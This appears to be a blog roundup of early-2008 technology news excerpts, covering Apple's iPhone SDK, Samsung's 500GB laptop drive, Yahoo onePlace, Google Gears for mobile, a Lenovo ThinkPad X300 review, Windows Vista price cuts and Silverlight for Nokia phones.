At an event Thursday at Apple headquarters, Mr. Jobs announced a low-cost software development kit that outside programmers can use to create programs for the iPhone, much as they now write the vast majority of the programs created for the Macintosh. Until now, iPhones have officially been able to run only the limited assortment of applications that Apple includes. (Some buyers have modified the phones to add unauthorized software.)

“We’re very excited about this,” said Mr. Jobs, who also announced that the company was adding features to make the iPhone more appealing to business users. “We think a lot of people, after understanding where we are going, are going to want to become an iPhone developer.”

Read more at NYT

To meet the growing storage needs of laptop users, Samsung Electronics on Tuesday introduced a 500GB hard drive that could provide a notebook PC with as much as 1TB of storage.

The Spinpoint M6, a 2.5-in. hard drive, fits into the chassis of commercial and multimedia notebooks, said Andy Higginbotham, director of hard drive sales at Samsung Semiconductor. Two drives can be combined for 1TB of storage, he said.

The company was able to fit three 167GB platters in a small frame to achieve 500GB of storage in one drive, Higginbotham said. The hard drive spins at 5,400 rpm.

Priced at $299, the hard drive will ship to PC makers and retail stores later this month. A company spokeswoman declined to comment on which PC makers will be using the drive.

Read More Via[CW]

Yahoo on Tuesday introduced onePlace, a service that lets people organize Web content so it can be quickly accessed through a mobile browser on a phone or other Internet-connected device.

Unveiled at the CeBit technology show in Hannover, Germany, onePlace creates bookmarks to Web pages and then lets users organize those bookmarks into categories. The service includes a search engine for finding bookmarks.

As Yahoo envisions it, a person planning a trip to Paris could create a collection of bookmarks, or links, to information such as a weather site, city guides, restaurant reviews, hotels, walking maps, etc. OnePlace includes a mobile RSS reader, so people can subscribe to content feeds to stay on top of the latest information.

Via[IW]

Google's quest to keep browser-based applications running while offline is expanding to where it may be needed most: mobile devices. A version of the Google Gears browser extension software is available to developers, according to a Monday blog posting by Google Mobile Product Manager Charles Wiles.

So far it's available only for
Microsoft Internet Explorer Mobile on Windows Mobile 5 and 6 devices, but there will be versions for other platforms, including Google's own Android system, Wiles wrote. Google Gears, still in beta testing, lets people continue to work with Web-based applications after they've gone offline. Data and documents are saved on the device so users can see and work on them any time. Gears is already available for desktops and notebooks, with versions for Internet Explorer on Windows XP and Vista, and for Firefox on XP, Vista, MacOS and Linux. Gears for Mobile is a port of that software.

Via[PCW]

The new Lenovo ThinkPad X300 notebook PC is a joy to use. It’s also one of the thinnest and lightest PCs on the market and, partially because it has a solid state drive instead of a hard drive, it’s also very fast and more energy efficient than most notebook PCs. The downside: It’s expensive and it has only 64 gigabytes of storage. Thanks to Apple this isn’t the thinnest or lightest PC on the market. Apple’s recently released MacBook Air - only 0.76 inch thick and weighing 3 pounds - takes that honor. But at less than one inch thick, the new ThinkPad is thin enough. The weight ranges from just under 3 pounds to 3.5 pounds depending on how it’s configured. The model I’m testing with a DVD player/recorder and a long life battery is at the higher end of that spectrum. Unlike the MacBook Air, the ThinkPad comes with an optional internal optical drive that can read and write CDs and DVDs. Sure, there are ways to install software without a DVD or CD drive but - truth be told - I love having one so I can rip CDs and watch movies. Apple, of course, is more than happy for people to buy their music and movies on iTunes. And speaking of movies and music, the X300 has very nice stereo speakers mounted just below the screen. My previous Lenovo lightweight model - the X61 - had a speaker on its underside, perfectly placed to muffle the sound. Apple’s MacBook Air has a mono speaker. Of course, you don’t spend nearly $3,000 on a laptop just to watch movies (yes, the fully loaded version of this puppy is expensive) which is why Lenovo - keeping up with the high standards of its predecessor IBM - pays a lot of attention to user amenities, like the keyboard and pointing device. [Lenovo bought IBM’s PC division a few years ago.]

In an unexpected and quite surprising move, Microsoft announced it will slash the prices of Windows Vista versions as soon as Service Pack 1 will be officially released.

As you might already know, the retail copy of Windows Vista Ultimate will cost $320 instead of $399, while the upgrade version has been reduced from $259 to only $219.

Slashing the price of an operating system that has been introduced just one year ago is quite an unusual move, especially for Microsoft.

Officially, the company said the move is intended to speed up the Windows Vista adoption. It seems like after more than a year, Microsoft is still having hard times to convince users that the new OS is better than Windows XP.

Although Windows Vista is more technically advanced than its predecessor and it offers more features and advanced security options, it seems like the problems with the missing drivers for all kind of devices and the stiff hardware requirements are holding back users from migrating to Windows Vista. Microsoft is in a quite strange situation: it is competing against itself.

Via[eFM]

Microsoft bringing Silverlight to cell phones, partnering with Nokia to bring the rich Internet app browser plug-in to devices that use Nokia's popular S60 software platform.

Nokia will also make Silverlight available on its Series 40 devices and its Internet Tablet devices, the companies are expected to announce Tuesday.

The strategy to get Silverlight on mobile devices -- and particularly on the Symbian OS -- is part of Microsoft's effort to make the browser plug-in a cross-platform, cross-browser product in order to get as much penetration as possible on the Web. The company is also working on a version of Silverlight for Windows Mobile, a beta version of which is due out soon.

Microsoft is coming from behind. Adobe has had a strong mobile presence for Flash for years. It has distribution agreements with 18 of the top 20 device manufacturers worldwide including Nokia, and according to Adobe, 450 million devices have been shipped so far with Flash Lite, which is a trimmed down version of Flash. That, of course, compares to zero for Microsoft. According to Adobe, Flash Lite has seen a 150% growth in the past year.

While Microsoft's early Silverlight mobile strategy will focus on Symbian and Windows Mobile, Adobe also supports BREW and a few other proprietary operating systems.

Read More....Via[IW]